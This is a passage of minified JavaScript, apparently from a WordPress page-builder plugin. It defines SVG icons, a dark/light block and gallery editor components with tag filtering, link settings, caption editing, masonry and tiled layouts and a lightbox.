.53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,o.createElement)("defs",null)),a.sun_line=(0,o.createElement)("svg",{viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const i=a},21123:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(90466),n=l(732),r=l(28166);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/dark-light/","block_docs"),s(r,{icon:(0,o.createElement)("div",{className:"ultp-block-inserter-icon-section"},(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/dark_light.svg"}),!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-pro-block"},"Pro")),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Switch between Dark and Light versions of your site","ultimate-post")),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/layouts/dark_light/dark7.svg"}},edit:i.Z,save:()=>null})},49540:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(69815),i=l(41385),n=l(50828);const{useState:r,useRef:s,useEffect:p}=wp.element,{Modal:c,Tooltip:u}=wp.components,{MediaUploadCheck:d,MediaUpload:m}=wp.blockEditor,g=({store:e,images:t,setAttributes:l,attr:g})=>{const[y,b]=r(!1),[v,h]=r([...t]),[f,k]=r(null),[w,x]=r(null),T=s(null),_=s(null);p((()=>{h([...t])}),[t]);const[C,E]=r(!1),[S,P]=r({}),[L,I]=r(!1),B=g?.imageList?JSON.parse(g?.imageList):[];return(0,o.createElement)("div",{className:"ultp-section-accordion"},(0,o.createElement)("div",{className:"ultp-section-accordion-item ultp-section-control",onClick:()=>b(!y)},(0,o.createElement)("span",{className:"ultp-section-control__help"},"Add Gallery Item"),(0,o.createElement)("span",{className:`ultp-section-arrow dashicons dashicons-arrow-${y?"down":"up"}-alt2`})),(0,o.createElement)("div",{className:"ultp-section-show "+(y?"is-hide":"")},(0,o.createElement)("div",{className:"ultp-gallery-settings"},(0,o.createElement)("div",{className:"ultp-gallery-settings__heading"},(0,o.createElement)(d,null,(0,o.createElement)(m,{gallery:!0,multiple:!0,onSelect:e=>{e.length>0&&l({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,sizes:e?.sizes?e?.sizes:[],caption:e.caption}))))})},allowedTypes:["image"],value:B?.map((e=>e?.id?e?.id:"")),render:({open:e})=>(0,o.createElement)("div",{onClick:e,className:"ultp-gallery-settings__add-media"},(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-plus-alt2"}),"Add Media")})),(0,o.createElement)("div",{className:"ultp-gallery-settings__media-count"},B?.length," Files")),(0,o.createElement)(o.Fragment,null,L&&(0,o.createElement)(c,{className:"ultp-gallery-settings__modal",onRequestClose:()=>I(!1),title:("tag"==C?"Filter":"Link")+" Config. Settings"},"tag"==C&&(0,o.createElement)(a.Z,{store:e,images:t,setEditImgData:P,editImgData:S,attr:g,setEditPanel:E}),"link"==C&&(0,o.createElement)(i.Z,{attr:g,store:e,images:t,setOpen:I,setItems:h,editImgData:S,setEditImgData:P,setEditPanel:E}),"editImg"==C&&(0,o.createElement)(n.Z,{attr:g,items:v,setItems:h,editImgData:S,setEditImgData:P,setAttributes:l}))),(0,o.createElement)("div",{className:"ultp-gallery-settings__content",ref:T,onDrop:e=>{if(e.preventDefault(),_.current===w)return;const t=[...v],o=t[_.current];t.splice(_.current,1),t.splice(w,0,o),h(t),l({imageList:JSON.stringify(t)}),_.current=null,k(null),x(null)},onDragOver:e=>e.preventDefault()},B.map(((t,l)=>(0,o.createElement)("div",{key:t.id,draggable:!0,onDragStart:()=>((e,t)=>{_.current=e,k(e);const l=document.createElement("img");l.src=v[e].sizes.thumbnail?.url,l.style.width="50px",l.style.height="50px",l.style.opacity="0.8"})(l),onDragOver:e=>((e,t)=>{e.preventDefault(),x(t)})(e,l),className:`ultp-gallery-settings__content-item ${f===l?"dragging":""} ${w===l?"target":""}`},(0,o.createElement)("img",{src:t.sizes.thumbnail?.url?.length>0?t.sizes.thumbnail?.url:t?.url,alt:t?.alt,style:{opacity:f===l?.5:1,transition:"opacity 0.2s ease"}}),(0,o.createElement)("div",{className:"ultp-gallery-settings__content-item-action"},(0,o.createElement)(u,{text:"Edit Caption"},(0,o.createElement)("span",{onClick:()=>(e=>{P(e),E("editImg"),I(!0)})(t),className:"dashicons dashicons-edit"})),(0,o.createElement)(u,{text:"Edit Filter"},(0,o.createElement)("span",{onClick:()=>(e=>{I(!0),E("tag"),P(e)})(t),className:"dashicons dashicons-edit-page"})),(0,o.createElement)(u,{text:"Edit Link"},(0,o.createElement)("span",{onClick:()=>(e=>{I(!0),E("link"),P(e)})(t),className:"dashicons dashicons-admin-links"})),(0,o.createElement)(u,{text:"Delete Item"},(0,o.createElement)("span",{onClick:()=>(t=>{const l=v.filter((e=>e.id!=t));h([...l]),e.setAttributes({imageList:JSON.stringify(l)})})(t.id),className:"dashicons dashicons-trash"}))))))))))}},69815:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useState:a,useEffect:i}=wp.element,n=({attr:e,setEditPanel:t,store:l,editImgData:n,setEditImgData:r,images:s})=>{const[p,c]=a(!1),[u,d]=a(""),[m,g]=a(n),[y,b]=a(!1),[v,h]=a(""),[f,k]=a(!1),[w,x]=a(null==JSON.parse(l?.attributes?.tagStorage)?[]:JSON.parse(l?.attributes?.tagStorage)),T=e=>{const t=m?.tag.filter((t=>t!=e));m.tag=t,g({...m}),r({...m})};i((()=>{const e=s.findIndex((e=>e.id===m.id)),t=[...s];-1!==e?t[e]=m:t.push(m),l.setAttributes({imageList:JSON.stringify(t)})}),[m]),i((()=>{n?.id&&(async e=>{const t=await(wp?.data?.resolveSelect("core")?.getEntityRecord("postType","attachment",n?.id));t&&t?.title?.raw?.length>0?d(t?.title?.raw):console.error("Media details not found for ID:",e)})(n.id)}),[n?.id]);const[_,C]=a(!1);return(0,o.createElement)("div",{className:"ultp-gallery-query-tag"},(0,o.createElement)("div",{className:"ultp-gallery-query-tag__image-container"},u?.length>0&&(0,o.createElement)("span",null,u),(0,o.createElement)("img",{src:n.url,alt:n.alt})),(0,o.createElement)("div",null,(0,o.createElement)("div",{className:"ultp-gallery-query-tag__selected-list"},m?.tag?.length>0?m?.tag.map((e=>(0,o.createElement)("span",{key:e,onClick:()=>T(e)},(0,o.createElement)("span",{className:"dashicons dashicons-dismiss pgc-delete-icon"}),e))):(0,o.createElement)("div",null,"Not Any Tag Selected")),(0,o.createElement)("div",{className:"ultp-gallery-query-tag__new"},(0,o.createElement)("input",{type:"text",value:v,onChange:e=>{return t=e.target.value,h(t),void b(!1);var t}}),(0,o.createElement)("button",{className:v&&v.length>0&&/^(?=.*[a-zA-Z0-9])[a-zA-Z0-9\s]+$/.test(v)&&!y?"":"add-new-tag-btn",onClick:()=>(()=>{const e=JSON.parse(l?.attributes?.tagStorage).includes(v);if(v&&!e){var t;const e=[...null!==(t=m?.tag)&&void 0!==t?t:""];m.tag=[...e,v],g({...m}),r({...m});const o=[...w,v];x([...o]),l.setAttributes({tagStorage:JSON.stringify(o)}),h("")}else b(!0)})()},"Add New")),(0,o.createElement)("div",{className:"ultp-gallery-query-tag__new-help"},y?"This tag is Exist":"Allowed Ony Text and Number"),w?.length>0?(0,o.createElement)("div",{className:"ultp-gallery-query-tag__get-tag-store",onClick:()=>(C(!_),void k(!1))},_?"Hide Storage":"Get from Tag storage"," ",(0,o.createElement)("span",{className:"dashicons dashicons-update-alt "})):"",_&&w?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-query-tag__existing-tag-container "+(f?"remove-tag-active":"")},w.map((e=>(0,o.createElement)("span",{key:e,className:"ultp-gallery-query-tag__existing-tag "+(m?.tag?.length>0&&m?.tag.includes(e)&&!f?"tag-disable":""),onClick:()=>(e=>{if(f){T(e);const t=w.filter((t=>t!=e));x([...t]),l.setAttributes({tagStorage:JSON.stringify(t)}),s.map((t=>{const l=t?.tag?.filter((t=>t!=e));t.tag=l})),l.setAttributes({imageList:JSON.stringify(s)})}else{var t;const l=[...null!==(t=m?.tag)&&void 0!==t?t:""];m.tag=[...l,e],g({...m}),r({...m})}})(e)},f?(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}):(0,o.createElement)("span",{className:"dashicons dashicons-tag"}),e)))),_&&w?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-query-tag__remove-tag "+(f?"removing-done":""),onClick:()=>k(!f)},f?"Tag Removing Done":"Delete Specific Tag",f?(0,o.createElement)("span",{className:"dashicons dashicons-yes"}):(0,o.createElement)("span",{className:"dashicons dashicons-trash"}))))}},41385:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294);const{useState:a,useRef:i,useEffect:n}=wp.element,{TextControl:r,CheckboxControl:s}=wp.components,p=({attr:e,setEditPanel:t,store:l,editImgData:i,setEditImgData:p,images:c,setOpen:u,setItems:d})=>{let m=JSON.parse(l?.attributes?.pageListData);const[g,y]=a(i?.link?i?.link:""),[b,v]=a(""),[h,f]=a(!!i?.newTab&&i?.newTab);return n((()=>{const e=setTimeout((()=>{v(b)}),500);return()=>{clearTimeout(e)}}),[b]),m=m.filter((e=>e.title.toLowerCase().includes(b?.toLowerCase()))),(0,o.createElement)("div",{className:"ultp-gallery-query-link"},(0,o.createElement)("div",null,(0,o.createElement)(r,{value:g,label:"Enter The Destination URL",placeholder:"Enter The Destination URL.....",onChange:e=>{y(e),v("")}})),(0,o.createElement)("div",null,(0,o.createElement)(r,{label:"Or link to existing content",value:b,placeholder:"Search Targeted Page name",onChange:e=>v(e)})),m?.length>0&&(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:"ultp-gallery-link-page__label"},"All Page List"),(0,o.createElement)("div",{className:"ultp-gallery-link-page"},m.map((e=>(0,o.createElement)("div",{key:e.id,onClick:()=>((e,t)=>{v(e),y(t)})(e.title,e.link),className:"ultp-gallery-link-page__single-page",contentEditable:!1},e.title))))),!m?.length&&(0,o.createElement)("div",{className:"ultp-gallery-link__no-page"},"No Page Match"),(0,o.createElement)(s,{label:"Open New Tab",checked:h,onChange:e=>f(e)}),(0,o.createElement)("div",{className:"ultp-gallery-query-link__bottom-content"},(0,o.createElement)("div",{onClick:()=>(()=>{const e=i;g?.length>0&&(e.link=g,e.newTab=h),c.map((t=>{t.id==e.id&&(t.link=g,t.newTab=h)})),d([...c]),l.setAttributes({imageList:JSON.stringify(c)}),u(!1)})(),className:"ultp-gallery-query-link__bottom-content__add-link"},(0,o.createElement)("span",{className:"ultp-section-arrow dashicons dashicons-plus-alt2"}),"Add Link")))}},50828:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useState:a}=wp.element,{TextControl:i}=wp.components,n=({editImgData:e,attr:t,setEditImgData:l,setItems:n,items:r,setAttributes:s})=>{const[p,c]=a(e?.alt?.length>0?e?.alt:""),[u,d]=a(e?.caption?.length>0?e?.caption:"");return(0,o.createElement)("div",{className:"ultp-gallery-img-data"},(0,o.createElement)("div",{className:"ultp-gallery-img-data__content"},(0,o.createElement)("div",{className:"ultp-gallery-img-data__content-img-container"},(0,o.createElement)("img",{src:e?.url,alt:e?.alt})),(0,o.createElement)("div",{className:"ultp-gallery-img-data__content-field-container"},(0,o.createElement)(i,{label:"Caption",value:u,className:"ultp-gallery-img-data__caption",onChange:t=>{return d(l=t),void wp.apiFetch({path:`/wp/v2/media/${e.id}`,method:"POST",data:{caption:l}}).then((t=>{t?.caption?.raw?.length>0&&(r.map((l=>{l.id==e.id&&(l.caption=t?.caption?.raw)})),n([...r]),s({imageList:JSON.stringify(r)}))})).catch((e=>{console.error("Error updating caption:",e)}));var l},placeholder:"Enter Image Caption..."}),(0,o.createElement)(i,{label:"Alternative Text",value:p,className:"ultp-gallery-img-data__alt-text",onChange:t=>{return c(l=t),void wp.apiFetch({path:`/wp/v2/media/${e.id}`,method:"POST",data:{alt_text:l}}).then((t=>{t?.alt_text?.length>0&&(r.map((l=>{l.id==e.id&&(l.alt=t?.alt_text)})),n([...r]),s({imageList:JSON.stringify(r)}))})).catch((e=>{console.error("Error updating caption:",e)}));var l},placeholder:"Enter Image Alternative Text..."}))))}},35343:(e,t,l)=>{"use strict";l.d(t,{Z:()=>k});var o=l(67294),a=l(53049),i=l(99838),n=l(59902),r=l(64766),s=l(75938),p=l(65638);const{__}=wp.i18n,{useEffect:c,useState:u,Fragment:d,useRef:m}=wp.element,{RichText:g,MediaUploadCheck:y,MediaPlaceholder:b,useBlockProps:v}=wp.blockEditor,{getBlockAttributes:h,getBlockRootClientId:f}=wp.data.select("core/block-editor");function k(e){const[t,l]=u("Content"),{name:g,setAttributes:k,attributes:_,className:C,clientId:E,attributes:{blockId:S,allText:P,imgSize:L,imageList:I,advanceId:B,imgEffect:U,enableLink:M,tagStorage:A,previewImg:H,galleryType:N,glImgHeight:j,filterEnable:Z,loadMoreText:O,pageListData:R,imgAnimation:D,currentPostId:z,enableAllText:F,captionEnable:W,galleryColumn:V,enableLightBox:G,enableLoadMore:q,actionPosition:$,enableDownload:K,displayCaption:J,captionPosition:Y,galleryColumnGap:X,displayThumbnail:Q,postPerPageCount:ee,actionDisplayType:te,captionDisplayType:le,enableLightBoxOnImg:oe,defaultSelectedFilter:ae}}=e;let ie;if(c((()=>{const e=E.substr(0,6),t=h(f(E));(0,a.qi)(k,t,z,E),S?S&&S!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||k({blockId:e})):k({blockId:e})}),[E]),S&&(ie=(0,i.Kh)(_,"ultimate-post/gallery",S,(0,a.k0)())),H)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:H});const[ne,re]=u(!0);c((()=>{setTimeout((()=>{re(!1)}),5e3)}),[]);const se=wp.data.select("core").getEntityRecords("postType","page",{per_page:-1});c((()=>{!(R&&JSON.parse(R)?.length>0)&&se?.length>0&&k({pageListData:JSON.stringify(se.map((e=>({id:e?.id,title:e.title.raw,link:e.link}))))})}),[se]);const pe={name:g,section:t,pageData:se,clientId:E,setSection:l,attributes:_,setAttributes:k,pageListData:R},ce=m(null),[ue]=(0,n.Z)(),de=Number(X[ue])||0,me=Number(j[ue]),ge=me+de,ye=Number(V[ue]),be=ce?.current?.getBoundingClientRect().width;let ve=JSON.parse(I);const he=JSON.parse(I),fe=A&&JSON.parse(A)?.length>0?JSON.parse(A):[],[ke,we]=u(0),[xe,Te]=u([]),[_e,Ce]=u([]),[Ee,Se]=u(0),[Pe,Le]=u(0);c((()=>{if(Ee==ve?.length){if(Le(0),"masonry"==N){const e=()=>{if(!ce.current)return;const e=ye,t=(be-(e-1)*de)/e;we(t);const l=Array(e).fill(0),o=[];ve.forEach(((e,a)=>{const i=window.frames["editor-canvas"]?.document?.getElementById(`img-${a+S}`),n=document.getElementById(`img-${a+S}`)||i;if(!n)return;n.style.maxWidth=`${t}px`;const r=n.getBoundingClientRect().height,s=l.indexOf(Math.min(...l)),p=l[s],c=s*(t+de);o[a]={top:p,left:c},l[s]+=r+de})),Te(o),Le(Math.max(...l))},t=requestAnimationFrame(e),l=()=>{requestAnimationFrame(e)};return window.addEventListener("resize",l),()=>{cancelAnimationFrame(t),window.removeEventListener("resize",l)}}if("tiled"==N){const e=()=>{const e=ve.map((e=>{const{width:t,height:l}=(e=>{const t=new Image;return t.src=e,t.complete?{width:t.width,height:t.height}:{width:100,height:100}})(e?.sizes[L]?.url.length>0?e?.sizes[L]?.url:e.url);return t/l})),t=[];for(let l=0;l<ve?.length;l+=ye)t.push({images:ve.slice(l,l+ye),aspectRatios:e.slice(l,l+ye)});let l=0;t.forEach(((e,t)=>{l=l+me+de})),Le(l-de);const o=t.flatMap(((e,t)=>{const l=((e,t,l)=>{const o=e.reduce(((e,t)=>e+t),0),a=de/2/l*100,i=100-2*a*(e.length-1),n=e.map((e=>e/o*i));return n.map(((e,l)=>{const o=0===l?0:n.slice(0,l).reduce(((e,t)=>e+t),0)+2*a*l;return{maxWidth:"100%",top:t*ge+"px",left:`${o}%`,width:`${e}%`,height:`${me}px`,position:"absolute"}}))})(e.aspectRatios,t,be);return e.images.map(((e,t)=>l[t]))}));Ce(o)};e()}}else Se(ve?.length)}),[de,ue,I,me,N,Ee,V,be,ve?.length,Y,X,ae,ee[ue]]),ve=ae?.length?ve&&ve?.length&&ve?.filter((e=>e?.tag?.includes(ae))):ve;const Ie=ve,Be=Number(ee[ue]),[Ue,Me]=u(!1),[Ae,He]=u(Be),[Ne,je]=u(Be%ye);c((()=>{He(Be),je(Be%ye)}),[Be]),(q&&Ae<JSON.parse(I)?.length||Z&&fe&&fe?.length>0&&q&&Ae<ve?.length)&&(ve=ve.slice(0,Ae));const[Ze,Oe]=u({}),[Re,De]=u(0),ze=(e,t)=>{Oe(e),De(t)},Fe={enableLoadMore:q,loadMoreCount:Ae,defaultSelectedFilter:ae,tagList:fe,imageList:I,LoadMoreSpinner:Ue,handleLoadMore:()=>{Me(!0),setTimeout((()=>{Me(!1)}),1100),Ne&&Ne>0?(He((e=>e+ye-Ne)),je(!1)):He((e=>e+3))},setAttributes:k,loadMoreText:O,afterFilterItem:Ie},We=v({...B&&{id:B},className:`ultp-block-${S} ${C}`});return(0,o.createElement)(d,null,(0,o.createElement)(p.Z,{store:pe,images:JSON.parse(I),handleAddMedia:e=>{e?.length>0&&k({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,sizes:e?.sizes?e?.sizes:[],caption:e.caption}))))})}}),(0,o.createElement)("div",We,ie&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:ie}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},!ve?.length&&!(he.length>0)&&(0,o.createElement)(y,null,(0,o.createElement)(b,{gallery:!0,multiple:!0,labels:{title:"Create Gallery"},onSelect:e=>{e?.length>0&&k({imageList:JSON.stringify(e.map((e=>({id:e?.id,url:e?.url,alt:e?.alt,caption:e.caption,sizes:e?.sizes?e?.sizes:[]}))))})},accept:"image/*",allowedTypes:["image"],value:JSON.parse(I).map((e=>e?.id?e?.id:""))})),Z&&ve&&ve?.length>0&&(0,o.createElement)(w,{allText:P,tagList:fe,setAttributes:k,enableAllText:F,defaultSelectedFilter:ae}),(0,o.createElement)("div",{className:"ultp-gallery-wrapper",style:{height:ne&&ve?.length>0?"500px":"",opacity:Ue?"0.2":"1"}},ve?.length>0&&(0,o.createElement)("div",{ref:ce,className:`ultp-gallery-container ultp-gallery-${N}`,style:{position:"relative",opacity:ne?"0":"1",height:"grid"==N?"auto":Pe||"auto"}},ve.map(((e,t)=>{let l=!1,a=!1;if(xe?.length>0&&(l=xe[t]?.top||0,a=xe[t]?.left||0),e?.id)return(0,o.createElement)("div",{key:e.id,id:`img-${t+S}`,className:"ultp-gallery-item",style:"tiled"===N?_e[t]||{}:{top:l,left:a},onClick:()=>{oe&&!G&&ze(e,t)}},(0,o.createElement)("div",{className:`ultp-gallery-media ultp-action-${te} ${W?`ultp-caption-${Y} ultp-caption-${le}`:""}`},(0,o.createElement)("div",{className:"ultp-gallery-media__img-container"},(0,o.createElement)("div",{className:`ultp-image-block ultp-block-image-${D} ultp-gallery-${U}`},(0,o.createElement)("img",{alt:e?.alt,src:e?.sizes[L]&&e?.sizes[L]?.url?e?.sizes[L]?.url:e?.url,onLoad:()=>Se((e=>e+1))}))),W&&e.caption?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-media__caption-container"},(0,o.createElement)("div",{className:"ultp-gallery-media__caption"},e.caption)),(0,o.createElement)("div",{className:`ultp-gallery-action-container ultp-action-${$}`},(0,o.createElement)("div",{className:"ultp-gallery-action"},K&&r.ZP.download_line,G&&oe&&(0,o.createElement)("div",{onClick:()=>ze(e,t)},r.ZP.plus),M&&e?.link?.length>0&&r.ZP.link))))}))),(0,o.createElement)(T,{images:ve,blockLoader:ne})),!(ve.length>0)&&he.length>0&&ae.length>0&&(0,o.createElement)("div",{className:"ultp-no-gallery-message",style:{display:"block"}},"No Gallery item found"),(0,o.createElement)(x,{LoadMoreData:Fe}),Ze?.url?.length>0&&(0,o.createElement)(s.Z,{displayCaption:J,lightboxIndex:Re,setLightBoxIndex:De,activeLightBox:Ze,setActiveLightBox:Oe,displayThumbnail:Q,images:ve}))))}const w=({tagList:e,allText:t,setAttributes:l,enableAllText:a,defaultSelectedFilter:i})=>{const n=e=>{l({defaultSelectedFilter:e})};return(0,o.createElement)("div",{className:"ultp-gallery-filter"},a&&t?.length>0&&(0,o.createElement)("div",{className:"ultp-gallery-filter__item "+(""==i?"active-gallery-filter":""),onClick:()=>n(""),dangerouslySetInnerHTML:{__html:t}}),e.map((e=>(0,o.createElement)("div",{key:e,className:"ultp-gallery-filter__item "+(i==e?"active-gallery-filter":""),onClick:()=>n(e)},e))))},x=({LoadMoreData:{enableLoadMore:e,loadMoreCount:t,defaultSelectedFilter:l,tagList:a,imageList:i,LoadMoreSpinner:n,handleLoadMore:r,setAttributes:s,loadMoreText:p,afterFilterItem:c}})=>(0,o.createElement)(d,null,e&&t<JSON.parse(i)?.length&&!a.includes(l)&&(0,o.createElement)("div",{style:{opacity:n?"0.5":"1"}},(0,o.createElement)(g,{key:"editable",tagName:"div",className:"ultp-gallery-loadMore",keeplaceholderonfocus:"true",placeholder:__("Load More Text…","ultimate-post"),onClick:()=>r(),onChange:e=>s({loadMoreText:e}),value:p})),e&&t<c?.length&&a.includes(l)&&(0,o.createElement)("div",{style:{opacity:n?"0.5":"1"}},(0,o.createElement)(g,{key:"editable",tagName:"div",className:"ultp-gallery-loadMore",keeplaceholderonfocus:"true",placeholder:__("Load More Text…","ultimate-post"),onClick:()=>r(),onChange:e=>s({loadMoreText:e}),value:p}))),T=({blockLoader:e,images:t})=>(0,o.createElement)(d,null,(0,o.createElement)("div",{className:"gallery-postx "+(e&&t?.length>0?"gallery-active":"")},(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"}),(0,o.createElement)("div",{className:"skeleton-box"})))},75938:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(64766);const{useEffect:i,useState:n,useRef:r}=wp.element,s=({images:e,lightboxIndex:t,activeLightBox:l,displayCaption:s,setActiveLightBox:p,setLightBoxIndex:c,displayThumbnail:u})=>{const[d,m]=n(!0),[g,y]=n(1),b=l=>{let o=t;o="left"===l?0===t?e?.length-1:t-1:(t+1)%e?.length,c(o),p(e[o])},v=r(null),h=r({rightIcon:null,leftIcon:null,control:null,gallery:null}),f=r(null);return i((()=>{const e=e=>{const{rightIcon:t,leftIcon:l,control:o,gallery:a}=h.current;!v.current||v.current.contains(e.target)||!t||t.contains(e.target)||!l||l.contains(e.target)||!o||o.contains(e.target)||u&&(!a||a.contains(e.target))||p({})};return document.addEventListener("mousedown",e),()=>{document.removeEventListener("mousedown",e)}}),[]),(0,o.createElement)("div",{className:"ultp-gallery-lightbox",ref:f},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__control",ref:e=>h.current.control=e},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__full-screen"},a.ZP?.full_screen),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__zoom-in",onClick:()=>y(g+.5)},a.ZP?.zoom_in),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__zoom-out",onClick:()=>y(g-.5)},a.ZP?.zoom_out),(0,o.createElement)("div",{onClick:()=>p({}),className:"ultp-gallery-lightbox__close"},a.ZP?.close_line),u&&(0,o.createElement)("div",{className:"ultp-gallery-lightbox__indicator-control",onClick:()=>m(!d)},a.ZP?.gallery_indicator)),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__inside"},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__content"},(0,o.createElement)("div",{className:"ultp-gallery-lightbox__left-icon",onClick:()=>b("left"),ref:e=>h.current.leftIcon=e},a.ZP?.leftArrowLg),(0,o.createElement)("div",{className:"ultp-lightbox__img-container",ref:v},(0,o.createElement)("img",{className:"ultp-lightbox__img",style:{transform:`scale(${g})`,position:"relative",zIndex:"99999999999999999999999999999"},src:l?.url,alt:l?.alt}),s&&l?.caption&&l?.caption?.length>0&&(0,o.createElement)("span",{className:"ultp-lightbox__caption"},l.caption)),(0,o.createElement)("div",{className:"ultp-gallery-lightbox__right-icon",onClick:()=>b("right"),ref:e=>h.current.rightIcon=e},a.ZP?.rightArrowLg)),u&&(0,o.createElement)("div",{className:"ultp-gallery-lightbox__gallery",ref:e=>h.current.gallery=e},d&&e.map(((e,t)=>(0,o.createElement)("div",{className:"ultp-gallery-lightbox__gallery-item "+(l.id==e.id?"lightbox-active":""),onClick:()=>((e,t)=>{p(e),c(t)})(e,t)},(0,o.createElement)("img",{src:e.sizes.thumbnail?.url,alt:e?.alt})))))))}},82110:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(87462),a=l(67294);const{useBlockProps:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,displayCaption:n,displayThumbnail:r,captionEnable:s,enableLightBoxOnImg:p,imageList:c,galleryType:u,lazyLoading:d,enableLoadMore:m,loadMoreText:g,tagStorage:y,defaultSelectedFilter:b,enableAllText:v,allText:h,enableDownload:f,enableLightBox:k,enableLink:w,actionPosition:x,captionPosition:T,actionDisplayType:_,captionDisplayType:C,imgEffect:E,imgAnimation:S,imgSize:P,filterEnable:L}=e.attributes,I=JSON.parse(c);let B=y&&JSON.parse(y)?.length>0?JSON.parse(y):[];if(!I?.length)return null;L||(B=[]);const U=i.save({...l&&{id:l},className:`ultp-block-${t} ultpMenuCss`});return(0,a.createElement)("div",(0,o.Z)({},U,{"data-bid":t,"data-lightbox":p,"data-caption":n,"data-indicators":r}),(0,a.createElement)("div",{className:"ultp-gallery-wrapper"},(0,a.createElement)("div",{className:"ultp-gallery-lightbox__control"},(0,a.createElement)("div",{className:"ultp-gallery-lightbox__full-screen"},"_ultp_gl_ic_full_screen_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__zoom-in"},"_ultp_gl_ic_zoom_in_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__zoom-out"},"_ultp_gl_ic_zoom_out_ultp_gl_ic_end_"),(0,a.createElement)("div",{className:"ultp-gallery-lightbox__close"},"_ultp_gl_ic_close_line_ultp_gl_ic_end_"),r&&(0,a.createElement)("div",{className:"ultp-gallery-lightbox__indicator-control"},"_ultp_gl_ic_gallery_indicator_ultp_gl_ic_end_")),B&&B?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-filter"},v&&h?.length>0&&(0,a.createElement)("div",{className:"ultp-gallery-filter__item active-gallery-filter",dangerouslySetInnerHTML:{__html:h}}),B.map((e=>(0,a.createElement)("div",{key:e,"data-tag":e,className:"ultp-gallery-filter__item "+(b==e?"active-gallery-filter":"")},e)))),(0,a.createElement)("div",{className:`ultp-gallery-container 